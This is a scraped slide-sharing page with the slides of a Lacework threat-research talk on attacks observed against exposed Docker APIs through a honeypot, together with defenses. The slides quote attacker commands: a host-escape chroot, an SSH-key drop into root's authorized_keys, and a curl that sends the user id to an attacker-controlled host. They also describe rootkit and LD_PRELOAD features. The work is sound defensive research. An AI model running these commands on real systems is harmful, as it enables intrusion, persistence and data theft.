GitOps (& Flux) for Helm Users with Scott RigbyGitOps (& Flux) for Helm Users with Scott Rigby
GitOps (& Flux) for Helm Users with Scott RigbyWeaveworks
 
Magento Docker Setup.pdf
Magento Docker Setup.pdfMagento Docker Setup.pdf
Magento Docker Setup.pdfAbid Malik
 

Ähnlich wie ATT&CKING Containers in The Cloud (20)

Top 5 benefits of docker
Top 5 benefits of dockerTop 5 benefits of docker
Top 5 benefits of docker
 
A TRUE STORY ABOUT DATABASE ORCHESTRATION
A TRUE STORY ABOUT DATABASE ORCHESTRATIONA TRUE STORY ABOUT DATABASE ORCHESTRATION
A TRUE STORY ABOUT DATABASE ORCHESTRATION
 
Custom Script Execution Environment on TD Workflow @ TD Tech Talk 2018-10-17
Custom Script Execution Environment on TD Workflow @ TD Tech Talk 2018-10-17Custom Script Execution Environment on TD Workflow @ TD Tech Talk 2018-10-17
Custom Script Execution Environment on TD Workflow @ TD Tech Talk 2018-10-17
 
gVisor, Kata Containers, Firecracker, Docker: Who is Who in the Container Space?
gVisor, Kata Containers, Firecracker, Docker: Who is Who in the Container Space?gVisor, Kata Containers, Firecracker, Docker: Who is Who in the Container Space?
gVisor, Kata Containers, Firecracker, Docker: Who is Who in the Container Space?
 
Pursuing evasive custom command & control - GuideM
Pursuing evasive custom command & control - GuideMPursuing evasive custom command & control - GuideM
Pursuing evasive custom command & control - GuideM
 
IAU workshop 2018 day one
IAU workshop 2018 day oneIAU workshop 2018 day one
IAU workshop 2018 day one
 
The Future of Security and Productivity in Our Newly Remote World
The Future of Security and Productivity in Our Newly Remote WorldThe Future of Security and Productivity in Our Newly Remote World
The Future of Security and Productivity in Our Newly Remote World
 
Swarm: Native Docker Clustering
Swarm: Native Docker ClusteringSwarm: Native Docker Clustering
Swarm: Native Docker Clustering
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3
 
Podman, Buildah, and Quarkus - The Latest in Linux Containers Technologies
Podman, Buildah, and Quarkus - The Latest in Linux Containers Technologies Podman, Buildah, and Quarkus - The Latest in Linux Containers Technologies
Podman, Buildah, and Quarkus - The Latest in Linux Containers Technologies
 
Autopilot : Securing Cloud Native Storage
Autopilot : Securing Cloud Native StorageAutopilot : Securing Cloud Native Storage
Autopilot : Securing Cloud Native Storage
 
The internals and the latest trends of container runtimes
The internals and the latest trends of container runtimesThe internals and the latest trends of container runtimes
The internals and the latest trends of container runtimes
 
KubeCon 2022 EU Flux Security.pdf
KubeCon 2022 EU Flux Security.pdfKubeCon 2022 EU Flux Security.pdf
KubeCon 2022 EU Flux Security.pdf
 
GCP - Continuous Integration and Delivery into Kubernetes with GitHub, Travis...
GCP - Continuous Integration and Delivery into Kubernetes with GitHub, Travis...GCP - Continuous Integration and Delivery into Kubernetes with GitHub, Travis...
GCP - Continuous Integration and Delivery into Kubernetes with GitHub, Travis...
 
Introduction to Docker and Monitoring with InfluxData
Introduction to Docker and Monitoring with InfluxDataIntroduction to Docker and Monitoring with InfluxData
Introduction to Docker and Monitoring with InfluxData
 
Making Service Deployments to AWS a breeze with Nova
Making Service Deployments to AWS a breeze with NovaMaking Service Deployments to AWS a breeze with Nova
Making Service Deployments to AWS a breeze with Nova
 
Here Be Dragons: Security Maps of the Container New World
Here Be Dragons: Security Maps of the Container New WorldHere Be Dragons: Security Maps of the Container New World
Here Be Dragons: Security Maps of the Container New World
 
O'Reilly Software Architecture Conference London 2017: Building Resilient Mic...
O'Reilly Software Architecture Conference London 2017: Building Resilient Mic...O'Reilly Software Architecture Conference London 2017: Building Resilient Mic...
O'Reilly Software Architecture Conference London 2017: Building Resilient Mic...
 
GitOps (& Flux) for Helm Users with Scott Rigby
GitOps (& Flux) for Helm Users with Scott RigbyGitOps (& Flux) for Helm Users with Scott Rigby
GitOps (& Flux) for Helm Users with Scott Rigby
 
Magento Docker Setup.pdf
Magento Docker Setup.pdfMagento Docker Setup.pdf
Magento Docker Setup.pdf
 

Mehr von MITRE ATT&CK

Dealing With ATT&CK's Different Levels Of Detail
Dealing With ATT&CK's Different Levels Of DetailDealing With ATT&CK's Different Levels Of Detail
Dealing With ATT&CK's Different Levels Of DetailMITRE ATT&CK
 
Automating testing by implementing ATT&CK using the Blackboard Architecture
Automating testing by implementing ATT&CK using the Blackboard ArchitectureAutomating testing by implementing ATT&CK using the Blackboard Architecture
Automating testing by implementing ATT&CK using the Blackboard ArchitectureMITRE ATT&CK
 
I can haz cake: Benefits of working with MITRE on ATT&CK
I can haz cake: Benefits of working with MITRE on ATT&CKI can haz cake: Benefits of working with MITRE on ATT&CK
I can haz cake: Benefits of working with MITRE on ATT&CKMITRE ATT&CK
 
CISA usage of ATT&CK in Cybersecurity Advisories
CISA usage of ATT&CK in Cybersecurity AdvisoriesCISA usage of ATT&CK in Cybersecurity Advisories
CISA usage of ATT&CK in Cybersecurity AdvisoriesMITRE ATT&CK
 
ATT&CK’s Adoption in CTI: A Great Success (with Room to Grow!)
ATT&CK’s Adoption in CTI: A Great Success (with Room to Grow!)ATT&CK’s Adoption in CTI: A Great Success (with Room to Grow!)
ATT&CK’s Adoption in CTI: A Great Success (with Room to Grow!)MITRE ATT&CK
 
Civil Society, Pegasus, and Predator: What Sophisticated Spyware Means For Us...
Civil Society, Pegasus, and Predator: What Sophisticated Spyware Means For Us...Civil Society, Pegasus, and Predator: What Sophisticated Spyware Means For Us...
Civil Society, Pegasus, and Predator: What Sophisticated Spyware Means For Us...MITRE ATT&CK
 
Evaluating and Enhancing Security Maturity through MITRE ATT&CK Mapping
Evaluating and Enhancing Security Maturity through MITRE ATT&CK MappingEvaluating and Enhancing Security Maturity through MITRE ATT&CK Mapping
Evaluating and Enhancing Security Maturity through MITRE ATT&CK MappingMITRE ATT&CK
 
MITRE ATT&CK Updates: State of the ATT&CK (ATT&CKcon 4.0 Edition)
MITRE ATT&CK Updates: State of the ATT&CK (ATT&CKcon 4.0 Edition)MITRE ATT&CK Updates: State of the ATT&CK (ATT&CKcon 4.0 Edition)
MITRE ATT&CK Updates: State of the ATT&CK (ATT&CKcon 4.0 Edition)MITRE ATT&CK
 
MITRE ATT&CK based Threat Analysis for Electronic Flight Bag
MITRE ATT&CK based Threat Analysis for Electronic Flight BagMITRE ATT&CK based Threat Analysis for Electronic Flight Bag
MITRE ATT&CK based Threat Analysis for Electronic Flight BagMITRE ATT&CK
 
Tidying up your Nest: Validating ATT&CK Technique Coverage using EDR Telemetry
Tidying up your Nest: Validating ATT&CK Technique Coverage using EDR TelemetryTidying up your Nest: Validating ATT&CK Technique Coverage using EDR Telemetry
Tidying up your Nest: Validating ATT&CK Technique Coverage using EDR TelemetryMITRE ATT&CK
 
Exploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOS
Exploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOSExploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOS
Exploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOSMITRE ATT&CK
 
MITRE ATT&CK Updates: State of the Cloud
MITRE ATT&CK Updates: State of the CloudMITRE ATT&CK Updates: State of the Cloud
MITRE ATT&CK Updates: State of the CloudMITRE ATT&CK
 
Using ATT&CK to created wicked actors in real data
Using ATT&CK to created wicked actors in real dataUsing ATT&CK to created wicked actors in real data
Using ATT&CK to created wicked actors in real dataMITRE ATT&CK
 
MITRE ATT&CK Updates: New Ideas in Enterprise - Pushing the boundaries of ATT...
MITRE ATT&CK Updates: New Ideas in Enterprise - Pushing the boundaries of ATT...MITRE ATT&CK Updates: New Ideas in Enterprise - Pushing the boundaries of ATT...
MITRE ATT&CK Updates: New Ideas in Enterprise - Pushing the boundaries of ATT...MITRE ATT&CK
 
Detection as Code, Automation, and Testing: The Key to Unlocking the Power of...
Detection as Code, Automation, and Testing: The Key to Unlocking the Power of...Detection as Code, Automation, and Testing: The Key to Unlocking the Power of...
Detection as Code, Automation, and Testing: The Key to Unlocking the Power of...MITRE ATT&CK
 
Navigating the Attention Economy – Using MITRE ATT&CK to Communicate to Stake...
Navigating the Attention Economy – Using MITRE ATT&CK to Communicate to Stake...Navigating the Attention Economy – Using MITRE ATT&CK to Communicate to Stake...
Navigating the Attention Economy – Using MITRE ATT&CK to Communicate to Stake...MITRE ATT&CK
 
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...MITRE ATT&CK
 
Driving Intelligence with MITRE ATT&CK: Leveraging Limited Resources to Build...
Driving Intelligence with MITRE ATT&CK: Leveraging Limited Resources to Build...Driving Intelligence with MITRE ATT&CK: Leveraging Limited Resources to Build...
Driving Intelligence with MITRE ATT&CK: Leveraging Limited Resources to Build...MITRE ATT&CK
 
MITRE ATT&CK Updates: ICS
MITRE ATT&CK Updates: ICSMITRE ATT&CK Updates: ICS
MITRE ATT&CK Updates: ICSMITRE ATT&CK
 
The case for quishing
The case for quishingThe case for quishing
The case for quishingMITRE ATT&CK
 

Mehr von MITRE ATT&CK (20)

Dealing With ATT&CK's Different Levels Of Detail
Dealing With ATT&CK's Different Levels Of DetailDealing With ATT&CK's Different Levels Of Detail
Dealing With ATT&CK's Different Levels Of Detail
 
Automating testing by implementing ATT&CK using the Blackboard Architecture
Automating testing by implementing ATT&CK using the Blackboard ArchitectureAutomating testing by implementing ATT&CK using the Blackboard Architecture
Automating testing by implementing ATT&CK using the Blackboard Architecture
 
I can haz cake: Benefits of working with MITRE on ATT&CK
I can haz cake: Benefits of working with MITRE on ATT&CKI can haz cake: Benefits of working with MITRE on ATT&CK
I can haz cake: Benefits of working with MITRE on ATT&CK
 
CISA usage of ATT&CK in Cybersecurity Advisories
CISA usage of ATT&CK in Cybersecurity AdvisoriesCISA usage of ATT&CK in Cybersecurity Advisories
CISA usage of ATT&CK in Cybersecurity Advisories
 
ATT&CK’s Adoption in CTI: A Great Success (with Room to Grow!)
ATT&CK’s Adoption in CTI: A Great Success (with Room to Grow!)ATT&CK’s Adoption in CTI: A Great Success (with Room to Grow!)
ATT&CK’s Adoption in CTI: A Great Success (with Room to Grow!)
 
Civil Society, Pegasus, and Predator: What Sophisticated Spyware Means For Us...
Civil Society, Pegasus, and Predator: What Sophisticated Spyware Means For Us...Civil Society, Pegasus, and Predator: What Sophisticated Spyware Means For Us...
Civil Society, Pegasus, and Predator: What Sophisticated Spyware Means For Us...
 
Evaluating and Enhancing Security Maturity through MITRE ATT&CK Mapping
Evaluating and Enhancing Security Maturity through MITRE ATT&CK MappingEvaluating and Enhancing Security Maturity through MITRE ATT&CK Mapping
Evaluating and Enhancing Security Maturity through MITRE ATT&CK Mapping
 
MITRE ATT&CK Updates: State of the ATT&CK (ATT&CKcon 4.0 Edition)
MITRE ATT&CK Updates: State of the ATT&CK (ATT&CKcon 4.0 Edition)MITRE ATT&CK Updates: State of the ATT&CK (ATT&CKcon 4.0 Edition)
MITRE ATT&CK Updates: State of the ATT&CK (ATT&CKcon 4.0 Edition)
 
MITRE ATT&CK based Threat Analysis for Electronic Flight Bag
MITRE ATT&CK based Threat Analysis for Electronic Flight BagMITRE ATT&CK based Threat Analysis for Electronic Flight Bag
MITRE ATT&CK based Threat Analysis for Electronic Flight Bag
 
Tidying up your Nest: Validating ATT&CK Technique Coverage using EDR Telemetry
Tidying up your Nest: Validating ATT&CK Technique Coverage using EDR TelemetryTidying up your Nest: Validating ATT&CK Technique Coverage using EDR Telemetry
Tidying up your Nest: Validating ATT&CK Technique Coverage using EDR Telemetry
 
Exploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOS
Exploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOSExploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOS
Exploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOS
 
MITRE ATT&CK Updates: State of the Cloud
MITRE ATT&CK Updates: State of the CloudMITRE ATT&CK Updates: State of the Cloud
MITRE ATT&CK Updates: State of the Cloud
 
Using ATT&CK to created wicked actors in real data
Using ATT&CK to created wicked actors in real dataUsing ATT&CK to created wicked actors in real data
Using ATT&CK to created wicked actors in real data
 
MITRE ATT&CK Updates: New Ideas in Enterprise - Pushing the boundaries of ATT...
MITRE ATT&CK Updates: New Ideas in Enterprise - Pushing the boundaries of ATT...MITRE ATT&CK Updates: New Ideas in Enterprise - Pushing the boundaries of ATT...
MITRE ATT&CK Updates: New Ideas in Enterprise - Pushing the boundaries of ATT...
 
Detection as Code, Automation, and Testing: The Key to Unlocking the Power of...
Detection as Code, Automation, and Testing: The Key to Unlocking the Power of...Detection as Code, Automation, and Testing: The Key to Unlocking the Power of...
Detection as Code, Automation, and Testing: The Key to Unlocking the Power of...
 
Navigating the Attention Economy – Using MITRE ATT&CK to Communicate to Stake...
Navigating the Attention Economy – Using MITRE ATT&CK to Communicate to Stake...Navigating the Attention Economy – Using MITRE ATT&CK to Communicate to Stake...
Navigating the Attention Economy – Using MITRE ATT&CK to Communicate to Stake...
 
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
 
Driving Intelligence with MITRE ATT&CK: Leveraging Limited Resources to Build...
Driving Intelligence with MITRE ATT&CK: Leveraging Limited Resources to Build...Driving Intelligence with MITRE ATT&CK: Leveraging Limited Resources to Build...
Driving Intelligence with MITRE ATT&CK: Leveraging Limited Resources to Build...
 
MITRE ATT&CK Updates: ICS
MITRE ATT&CK Updates: ICSMITRE ATT&CK Updates: ICS
MITRE ATT&CK Updates: ICS
 
The case for quishing
The case for quishingThe case for quishing
The case for quishing
 

Kürzlich hochgeladen

SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 

Kürzlich hochgeladen (20)

SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 

ATT&CKING Containers in The Cloud

  • 1. ATT&CKing Containers in The Cloud Jared Stroud (@DLL_Cool_J) © 2022, Lacework Inc. All Rights Reserved.
  • 2. © 2022, Lacework Inc. All Rights Reserved. 2 ● Jared Stroud ● Currently: Cloud Security Researcher @ Lacework ● Former: MITRE Security Engineer ○ ATT&CK EVALS Carbanak/Fin7 ○ CALDERA ● Presented at: ○ SANS Blue Team Summit - Lightning Talk ○ DEFCON - Packet Hacking Village ○ Interpol DFEG ○ Shmoocon - Fire Talk ○ DFRWS - EU ○ BSides Roc $> whoami Lacework Labs is the dedicated research team at Lacework. We decided to build with a focus on areas that we believe are not getting enough attention in the research community specifically around new threats and attack surface risks within the public cloud. Like any good research team, we use a combination of data-driven intelligence creation and our own expertise in the key areas we focus on.
  • 3. © 2022, Lacework Inc. All Rights Reserved. Agenda 3 The Shift to Container Workloads Honeypots Analyze The Data Container Focused Defenses
  • 4. © 2022, Lacework Inc. All Rights Reserved. Shifting to Container Workloads ● Enterprise continues to adopt container workloads. ○ This “shift left” mentality provides business advantages to get products to end-users faster. ● Adversaries have noticed, and have targeted misconfigurations around the container ecosystem, including: ○ T1190 - Code repositories CI/CD pipelines ■ Ex: Gitlab ○ T1538 - Cloud Service Dashboards ○ T1552.007 - Exposed APIs for Containers. ● Lacework Labs has observed the introduction of “rogue images” into environments via: ○ T1610 - Deploying a container. ○ T1608 - Stage malicious container on Docker Hub. 4
  • 5. © 2022, Lacework Inc. All Rights Reserved. Collecting Cloud Attack Data - Honeypots ● Honeypots ○ Emulate a service to a specific level of fidelity so an attacker throws an exploit/payload for collection. ● Consider the level of emulation fidelity you need. ○ Anecdotal example, having a simple netcat listener on port 9200 for Elasticsearch has caught the same payloads as Elasticsearch honeypots that actually do a level of service emulation. ○ Consider the adversary you’re looking to catch data from ■ Opportunistic vs Targeted 5
  • 6. © 2022, Lacework Inc. All Rights Reserved. Building Whalehoney - A Docker Honeypot ● At the time of architecting our honeypot infrastructure, not many solutions existed for Docker that weren’t heavily tied to a particular database. ● Engineers at Lacework Labs developed a simple Python Flask based application to emulate the Docker API based on the available documentation on the Docker engine. 6
  • 7. © 2022, Lacework Inc. All Rights Reserved. Quick Whalehoney Stats ● 244 unique payloads targeting the “api_container_create” endpoint ○ 24 payloads setting “privileged:true” ● 3 external SAAS services observed being used in attacks ● Docker Hub, Ngrok, Weaveworks’ Scope ○ Ngrok being leveraged in 146 payloads. 7
  • 9. © 2022, Lacework Inc. All Rights Reserved. Deploy Container (T1610) & Escape to Host (T1611) ● Deploy container: achieved via exposed API ● Escape to Host: achieved via mounting host’s “/” to container’s “/mnt” and chrooting 9
  • 10. T1611 - From Container → Host Pivot mount /:/mnt && chroot /mnt Exposed API Port (2375) Attacker’s payload
  • 11. mount /:/mnt && chroot /mnt Exposed API Port (2375) Attacker’s payload T1059.004 - Post-compromise Payloads - Shell Script Dropper
  • 12. mount /:/mnt && chroot /mnt Exposed API Port (2375) Attacker’s payload Post-compromise Payloads - Rootkits, Cryptominers, and ssh keys
  • 13. © 2022, Lacework Inc. All Rights Reserved. Notable Execution of Initial Payload (cronb.sh) ● ~1500 line bash script (T1059.004) to deploy additional utilities including: ● Kill potential cryptocurrency miners on host. ● Deploys their own XMRig Cryptocurrency miner ● Observed TTPs: ○ Kills Alibaba (CloudMonitor/Aliyun) cloud monitoring agent (T1562.001) ○ Deploys SSH key for continued access (T1098.004) ○ Deploys .so’s for LD_PRELOAD attacks (T1574.006) ○ Deploys Diamorphine Rootkit for hiding access (T1014) ○ Naming ELF payloads to <file_name>.jpg when downloading (T1036) ● Deploying C2 Agent (ZiggyStartgux/Katien/Tsunami - IRC Bot) ● curl <attacker_controlled_ip>/idcheck/$(id) (obtain user id) 13
  • 14. https://github.com/gianlucaborello/libprocesshider/blob/master/processhider.c Ghidra Pseudo C of Shared Objects grabbed by Docker bash script ● T1574.006 - Hijack Execution Flow: Dynamic Linker/Hijacking ○ Used for persistence/defense evasion ● Attack script wgets tar file of shared objects to be placed in /usr/local/lib and put in ld.so.preload. Notable Execution of Initial Payload (cronb.sh)
  • 15. ● Rootkit (T1014) Features include: ● When loaded, the module starts invisible. ● Hide/unhide any process by sending a signal 31. ● Sending a signal 63(to any pid) makes the module become (in)visible. ● Sending a signal 64(to any pid) makes the given user become root. ● Files or directories starting with the MAGIC_PREFIX become invisible. ● Diamorphine is built on the victim machine, and has the MAGIC_PREFIX unchanged. https://github.com/m0nad/Diamorphine/blob/master/diamorphine.h diamorphine.h from attacker’s payload Defense Evasion/Persistence - Diamorphine Rootkit
  • 16. echo ssh key to /root/.ssh/authorized_keys Exposed API Port (2375) Attacker’s payload ● cmd": ["sh", "-c", "echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIdl8SFK8a6 VAjM6i8AAUtpl15<snippet>' >> /opt/root/.ssh/authorized_keys] T1189 - Drive by Compromise (SSH Key Dropping)
  • 18. ● Lacework Labs has observed multiple adversaries leveraging Docker Hub as a staging ground. T1608 - Staging Capabilities (Docker Hub)
  • 19. ● Ngrok - legitimate utility for proxying local connections to public facing services (T1090). ○ Target users are developers that want to expose something locally on the internet. ○ Think of it as reverse ssh tunnels-as-a-service ● How adversaries abuse it: ○ Hosting payloads behind ngrok. ■ Free tier/paid tiers exist. ○ Avoids having to setup infrastructure beyond a VM. T1608 - Staging Capabilities (T1608) Ngrok
  • 20. mount /:/mnt && chroot /mnt Exposed API Port (2375) Attacker’s payload Stopping The Compromise! Don’t expose the Docker Socket!
  • 21. © 2022, Lacework Inc. All Rights Reserved. Beyond ACLs & Limiting exposed container APIs Docker Content Trust (DCT) ● Leverage Docker Content Trust (DCT) to enforce digital signatures for runtime verification of images in your environment. ○ Prevent non-signed images from running. ○ Caveat, DCT is enabled/disabled via an environment variable. ● Docker Notary ○ Built around The Update Framework ● Does introduce additional management overhead of handling signing keys/revocations/etc… Reference: https://docs.docker.com/engine/security/trust/ 21
  • 22. © 2022, Lacework Inc. All Rights Reserved. Beyond ACLs & Limiting exposed container APIs Securing Kubernetes Deployments ● Prevent accidental exposure of management dashboards! ○ Including 3rd party integrations (Argo/Gitlab/etc…) ● Open Policy Agent (OPA) Enforcement! ○ Admission controller to prevent privileged pods or unnecessary capabilities being paired with deployments in given namespaces. ○ Ex: prevent CAP_SYS_ADMIN from being set on a deployment. ● Deploy Signed Containers ○ GCP’s GKE - Binary Authorization ■ Ensure deployed workloads have been signed. ○ AWS EKS Image signing is on their road map according to documentation ■ https://aws.github.io/aws-eks-best-practices/security/docs/image/ 22
  • 23. © 2022, Lacework Inc. All Rights Reserved. Beyond ACLs & Limiting exposed container APIs Exploring Runtime Protection Options ● Profile and limit syscalls you application makes! ○ Runtime syscall allow-listing via seccomp ● Can be tricky to tune, but greatly reduces surface in the event of an application compromise. Reference: https://www.lacework.com/blog/sand-honey-building-honeypots/ 23
